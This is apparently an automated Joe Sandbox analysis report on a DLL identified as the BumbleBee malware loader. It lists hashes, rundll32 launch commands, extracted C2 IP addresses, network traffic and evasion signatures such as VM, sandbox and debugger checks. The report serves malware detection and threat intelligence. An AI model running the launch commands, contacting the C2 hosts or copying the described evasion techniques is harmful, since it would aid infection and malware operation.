Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mount.dll

Overview

General Information

Sample Name:mount.dll
Analysis ID:622711
MD5:8e7115ea580f39c152e4d4bc4472c402
SHA1:4ea1f1d8a01f251fa5db350f72b04a1d11028fb0
SHA256:c65c51ed60f91a92789c4b056821ef51252baa2a1679a6513ab008acf0464ccb
Infos:

Detection

BumbleBee
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected BumbleBee
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contain functionality to detect virtual machines
Searches for specific processes (likely to inject)
C2 URLs / IPs found in malware configuration
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
Contains long sleeps (>= 3 min)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 4084 cmdline: loaddll64.exe "C:\Users\user\Desktop\mount.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 4812 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mount.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 640 cmdline: rundll32.exe "C:\Users\user\Desktop\mount.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6016 cmdline: rundll32.exe C:\Users\user\Desktop\mount.dll,shjKeAQfgT MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 4112 cmdline: rundll32.exe "C:\Users\user\Desktop\mount.dll",shjKeAQfgT MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup

Malware Configuration

Threatname: BumbleBee

{"C2 url": ["282.19.133.12:443", "91.122.18.192:443", "185.156.172.62:443", "72.123.65.11:443", "149.255.35.167:443", "172.241.27.146:443"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
    00000002.00000003.333797150.000001B97EC0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
      00000003.00000003.333897258.0000021EF3D7C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
        00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
          00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.21ef2fe0000.0.raw.unpackJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
              3.2.rundll32.exe.21ef2fe0000.0.unpackJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
                4.2.rundll32.exe.1c3386e0000.2.unpackJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
                  4.2.rundll32.exe.1c3386e0000.2.raw.unpackJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 3.2.rundll32.exe.21ef2fe0000.0.unpackMalware Configuration Extractor: BumbleBee {"C2 url": ["282.19.133.12:443", "91.122.18.192:443", "185.156.172.62:443", "72.123.65.11:443", "149.255.35.167:443", "172.241.27.146:443"]}
                    Multi AV Scanner detection for submitted file
                    Source: mount.dllVirustotal: Detection: 49%Perma Link
                    Source: mount.dllMetadefender: Detection: 22%Perma Link
                    Source: mount.dllReversingLabs: Detection: 76%
                    Antivirus / Scanner detection for submitted sample
                    Source: mount.dllAvira: detected
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF302F050 CryptExportKey,CryptExportKey,3_2_0000021EF302F050
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF302F8B0 CryptAcquireContextW,CryptReleaseContext,3_2_0000021EF302F8B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF302F6B0 CryptEnumProvidersW,GetLastError,CryptEnumProvidersW,GetLastError,3_2_0000021EF302F6B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF302FCB0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptGetProvParam,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,3_2_0000021EF302FCB0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3144070 CryptCreateHash,3_2_0000021EF3144070
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF302E0B0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,3_2_0000021EF302E0B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3030030 CryptEnumProvidersW,CryptEnumProvidersW,GetLastError,GetLastError,3_2_0000021EF3030030
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304DED0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,QueryPerformanceCounter,GetTickCount,GlobalMemoryStatus,GetCurrentProcessId,3_2_0000021EF304DED0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3030380 CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertEnumCertificatesInStore,CertCloseStore,CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,3_2_0000021EF3030380
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF302E300 CryptCreateHash,CryptSetHashParam,CryptSignHashW,CryptDestroyHash,3_2_0000021EF302E300
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3030790 CryptDecrypt,3_2_0000021EF3030790
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872E300 CryptCreateHash,CryptSetHashParam,CryptSignHashW,CryptDestroyHash,4_2_000001C33872E300
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338730380 CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertEnumCertificatesInStore,CertCloseStore,CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,4_2_000001C338730380
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872E660 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,4_2_000001C33872E660
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338730700 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,4_2_000001C338730700
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338730790 CryptDecrypt,4_2_000001C338730790
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872FCB0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptGetProvParam,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,4_2_000001C33872FCB0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874DED0 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,QueryPerformanceCounter,GetTickCount,GlobalMemoryStatus,GetCurrentProcessId,4_2_000001C33874DED0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338730030 CryptEnumProvidersW,CryptEnumProvidersW,GetLastError,GetLastError,4_2_000001C338730030
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872E0B0 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,4_2_000001C33872E0B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338844070 CryptCreateHash,4_2_000001C338844070
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872F6B0 CryptEnumProvidersW,GetLastError,CryptEnumProvidersW,GetLastError,4_2_000001C33872F6B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872F8B0 CryptAcquireContextW,CryptReleaseContext,4_2_000001C33872F8B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C338730A60 CryptCreateHash,CryptSetHashParam,CryptSignHashW,CryptDestroyHash,4_2_000001C338730A60
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872ED70 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,4_2_000001C33872ED70
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872EE40 CryptAcquireContextW,CryptGetUserKey,CryptReleaseContext,4_2_000001C33872EE40
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33872F050 CryptExportKey,CryptExportKey,4_2_000001C33872F050
                    Source: unknownHTTPS traffic detected: 185.156.172.62:443 -> 192.168.2.4:49773 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.156.172.62:443 -> 192.168.2.4:49774 version: TLS 1.2
                    Source: mount.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

                    Networking

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 91.122.18.192 443Jump to behavior
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 282.19.133.12:443
                    Source: Malware configuration extractorURLs: 91.122.18.192:443
                    Source: Malware configuration extractorURLs: 185.156.172.62:443
                    Source: Malware configuration extractorURLs: 72.123.65.11:443
                    Source: Malware configuration extractorURLs: 149.255.35.167:443
                    Source: Malware configuration extractorURLs: 172.241.27.146:443
                    Source: Joe Sandbox ViewASN Name: ROSTELECOM-ASRU ROSTELECOM-ASRU
                    Source: Joe Sandbox ViewASN Name: M247GB M247GB
                    Source: Joe Sandbox ViewJA3 fingerprint: 0c9457ab6f0d6a14fc8a3d1d149547fb
                    Source: global trafficHTTP traffic detected: GET /gates HTTP/1.1
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.122.18.192
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.122.18.192
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.122.18.192
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.156.172.62
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.122.18.192
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.122.18.192
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.122.18.192
                    Source: rundll32.exe, 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/docs/faq.html
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FF3170 WSASetLastError,WSARecv,WSAGetLastError,3_2_0000021EF2FF3170
                    Source: global trafficHTTP traffic detected: GET /gates HTTP/1.1
                    Source: unknownHTTPS traffic detected: 185.156.172.62:443 -> 192.168.2.4:49773 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.156.172.62:443 -> 192.168.2.4:49774 version: TLS 1.2

                    E-Banking Fraud

                    barindex
                    Yara detected BumbleBee
                    Source: Yara matchFile source: 3.2.rundll32.exe.21ef2fe0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.rundll32.exe.21ef2fe0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.rundll32.exe.1c3386e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.rundll32.exe.1c3386e0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.333797150.000001B97EC0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.333897258.0000021EF3D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000003.338592600.000001C33946D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6016, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4112, type: MEMORYSTR
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30211C03_2_0000021EF30211C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FE90703_2_0000021EF2FE9070
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FE915A3_2_0000021EF2FE915A
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30411703_2_0000021EF3041170
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30631E03_2_0000021EF30631E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30552073_2_0000021EF3055207
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30972303_2_0000021EF3097230
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF301D0D03_2_0000021EF301D0D0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30530F03_2_0000021EF30530F0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30611003_2_0000021EF3061100
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30591003_2_0000021EF3059100
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305F1303_2_0000021EF305F130
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3054F603_2_0000021EF3054F60
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304EFAA3_2_0000021EF304EFAA
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30350303_2_0000021EF3035030
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF302F0503_2_0000021EF302F050
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3042E603_2_0000021EF3042E60
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF307EF103_2_0000021EF307EF10
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30E6F103_2_0000021EF30E6F10
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3114F383_2_0000021EF3114F38
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30835903_2_0000021EF3083590
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30595A03_2_0000021EF30595A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305B5A03_2_0000021EF305B5A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30556303_2_0000021EF3055630
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30574703_2_0000021EF3057470
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305D4A03_2_0000021EF305D4A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30635103_2_0000021EF3063510
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30535413_2_0000021EF3053541
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30555413_2_0000021EF3055541
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30015503_2_0000021EF3001550
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30533703_2_0000021EF3053370
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30653C03_2_0000021EF30653C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305F3E03_2_0000021EF305F3E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF303D2703_2_0000021EF303D270
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304F2933_2_0000021EF304F293
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF307D3103_2_0000021EF307D310
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30619903_2_0000021EF3061990
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF303D9903_2_0000021EF303D990
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FE990A3_2_0000021EF2FE990A
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3051A003_2_0000021EF3051A00
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF311FA003_2_0000021EF311FA00
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3059A403_2_0000021EF3059A40
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF302F8B03_2_0000021EF302F8B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30558F03_2_0000021EF30558F0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FE76A03_2_0000021EF2FE76A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30618203_2_0000021EF3061820
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30436703_2_0000021EF3043670
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30576903_2_0000021EF3057690
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30336A03_2_0000021EF30336A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FE98193_2_0000021EF2FE9819
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF303D6C03_2_0000021EF303D6C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305D6F03_2_0000021EF305D6F0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305F7303_2_0000021EF305F730
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FE37603_2_0000021EF2FE3760
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3091D803_2_0000021EF3091D80
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FF5CD03_2_0000021EF2FF5CD0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3125E3C3_2_0000021EF3125E3C
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3017C603_2_0000021EF3017C60
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3059C603_2_0000021EF3059C60
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305FC803_2_0000021EF305FC80
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3061C903_2_0000021EF3061C90
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF302FCB03_2_0000021EF302FCB0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3051D093_2_0000021EF3051D09
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305DD103_2_0000021EF305DD10
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3057D203_2_0000021EF3057D20
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305FB603_2_0000021EF305FB60
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3051B603_2_0000021EF3051B60
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FE9B303_2_0000021EF2FE9B30
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF303DBA03_2_0000021EF303DBA0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3017BB03_2_0000021EF3017BB0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF303DC003_2_0000021EF303DC00
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3053C003_2_0000021EF3053C00
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF303DC403_2_0000021EF303DC40
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3053A9A3_2_0000021EF3053A9A
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305BB103_2_0000021EF305BB10
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FEC0A03_2_0000021EF2FEC0A0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30622203_2_0000021EF3062220
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FE40903_2_0000021EF2FE4090
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30400C03_2_0000021EF30400C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30520E03_2_0000021EF30520E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30601303_2_0000021EF3060130
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305FF603_2_0000021EF305FF60
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FE3F303_2_0000021EF2FE3F30
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3051FE53_2_0000021EF3051FE5
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305BFF03_2_0000021EF305BFF0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30920503_2_0000021EF3092050
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3121E603_2_0000021EF3121E60
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3013E703_2_0000021EF3013E70
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304DED03_2_0000021EF304DED0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3061EF03_2_0000021EF3061EF0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304A5603_2_0000021EF304A560
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304C6103_2_0000021EF304C610
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30606403_2_0000021EF3060640
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305C4C03_2_0000021EF305C4C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30604E03_2_0000021EF30604E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30585203_2_0000021EF3058520
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305E3B03_2_0000021EF305E3B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30623D03_2_0000021EF30623D0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF311E4303_2_0000021EF311E430
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF2FEA2983_2_0000021EF2FEA298
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30522C03_2_0000021EF30522C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30663103_2_0000021EF3066310
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30949C03_2_0000021EF30949C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF3060A303_2_0000021EF3060A30
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305EA403_2_0000021EF305EA40
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30708603_2_0000021EF3070860
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30568A33_2_0000021EF30568A3
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30528D03_2_0000021EF30528D0
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF30989503_2_0000021EF3098950
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304A7953_2_0000021EF304A795
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF305E7903_2_0000021EF305E790
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304A79E3_2_0000021EF304A79E
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304A7A73_2_0000021EF304A7A7
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304A7B93_2_0000021EF304A7B9
                    Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000021EF304A7C23_2_0000021EF304A7C2
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387211C04_2_000001C3387211C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386E90704_2_000001C3386E9070
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387622204_2_000001C338762220
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387522C04_2_000001C3387522C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3386EA2984_2_000001C3386EA298
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387663104_2_000001C338766310
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387623D04_2_000001C3387623D0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875E3B04_2_000001C33875E3B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33881E4304_2_000001C33881E430
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387604E04_2_000001C3387604E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875C4C04_2_000001C33875C4C0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874A5604_2_000001C33874A560
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387585204_2_000001C338758520
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387606404_2_000001C338760640
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33874C6104_2_000001C33874C610
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33875C6E04_2_000001C33875C6E0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3388306F04_2_000001C3388306F0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C33876C6B04_2_000001C33876C6B0
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387526A14_2_000001C3387526A1
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387947504_2_000001C338794750
                    Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001C3387587404_2_000001C338758740
